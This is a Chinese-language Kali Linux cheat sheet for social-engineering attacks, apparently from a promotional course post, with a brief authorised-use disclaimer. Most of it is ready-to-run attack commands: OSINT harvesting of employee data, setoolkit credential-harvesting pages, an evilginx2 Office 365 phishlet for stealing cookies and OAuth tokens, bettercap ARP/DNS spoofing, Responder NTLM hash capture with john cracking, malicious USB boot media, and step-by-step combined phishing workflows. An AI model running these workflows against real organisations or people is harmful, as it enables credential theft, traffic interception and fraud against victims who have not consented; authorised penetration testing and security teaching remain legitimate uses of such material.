
【目录】
1. 合规使用声明
2. 模块一:社工库信息收集
3. 模块二:钓鱼攻击工具
4. 模块三:终端交互欺骗
5. 模块四:USB/物理社工辅助
6. 模块五:实战组合攻击流程
7. 常用一键脚本合集
---
1. 合规使用声明
本手册仅用于授权渗透测试、企业安全自检、网络安全教学研究。
严禁未经授权对任何网络、设备、个人实施攻击、信息窃取、诈骗等行为,违者需承担相应法律责任。
---
模块一:社工库信息收集
1.1 theHarvester
- 命令:theHarvester
- 作用:批量收集邮箱、子域名、主机、员工信息(公开数据源)
- 示例:theHarvester -d test.com -l 500 -b all
1.2 recon-ng
- 命令:recon-ng
- 作用:模块化信息侦察,批量爬取公开社工信息
- 示例:
recon-ng
workspace create test
use recon/domains-hosts/bing_domain_web
set SOURCE test.com
run
1.3 sherlock
- 命令:sherlock
- 作用:批量查询用户名在各大社交平台的注册信息
- 示例:sherlock username123
---
模块二:钓鱼攻击工具
2.1 setoolkit(SET)
- 命令:setoolkit
- 作用:集成化社会工程学攻击框架,支持钓鱼页面、邮件伪造
- 示例:
setoolkit
1(社会工程学攻击)
2(网站钓鱼攻击)
3(凭据收割)
1(Web模板)
2.2 gophish
- 命令:gophish
- 作用:可视化钓鱼邮件/页面管理,统计点击、凭据数据
- 示例:gophish 启动后访问 https://IP:3333 登录后台
2.3 evilginx2
- 命令:evilginx2
- 作用:中间人钓鱼,窃取Cookie、OAuth令牌
- 示例:
evilginx2
phishlets hostname test.com
phishlets enable o365
phishlets start
---
模块三:终端交互欺骗
3.1 bettercap
- 命令:bettercap
- 作用:ARP欺骗、DNS劫持、HTTP/HTTPS流量嗅探
- 示例:
bettercap -iface eth0
set arp.spoof on
set dns.spoof on
set http.proxy on
start
3.2 dnsspoof
- 命令:dnsspoof
- 作用:DNS欺骗,将目标域名解析到恶意IP
- 示例:dnsspoof -i eth0 host test.com
3.3 responder
- 命令:responder
- 作用:劫持SMB、HTTP、LDAP等协议,抓取NTLM哈希
- 示例:responder -I eth0 -d -v
---
模块四:USB/物理社工辅助
4.1 usbrip
- 命令:usbrip
- 作用:分析目标主机USB设备连接日志
- 示例:usbrip events history
4.2 mkusb
- 命令:mkusb
- 作用:制作恶意USB启动盘,用于物理渗透引导
- 示例:mkusb /dev/sdb
4.3 pwnplug
- 命令:pwnplug
- 作用:物理接入设备的自动化社工脚本启动工具
- 示例:pwnplug -c auto
---
模块五:实战组合攻击流程
流程1:内网社工钓鱼+哈希抓取
1. 信息收集:theHarvester -d company.com -b all
2. 启动Responder:responder -I eth0
3. SET搭建钓鱼页面:setoolkit 生成内网系统仿冒页面
4. 发送钓鱼链接,抓取NTLM哈希
5. 哈希验证:john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
流程2:DNS劫持+钓鱼页面
1. 启动Bettercap执行ARP/DNS欺骗
2. Evilginx2搭建OA系统钓鱼站点
3. 目标访问伪造页面,窃取登录凭证
4. 导出数据并做授权验证
---
常用一键脚本合集
一键启动Responder
responder -I eth0 -d -w -v
一键信息收集
theHarvester -d $1 -l 1000 -b all > info.txt
一键ARP嗅探
bettercap -iface eth0 -eval "arp.spoof on; http.proxy on; start"
点击阅读原文,学习Kali与编程最全课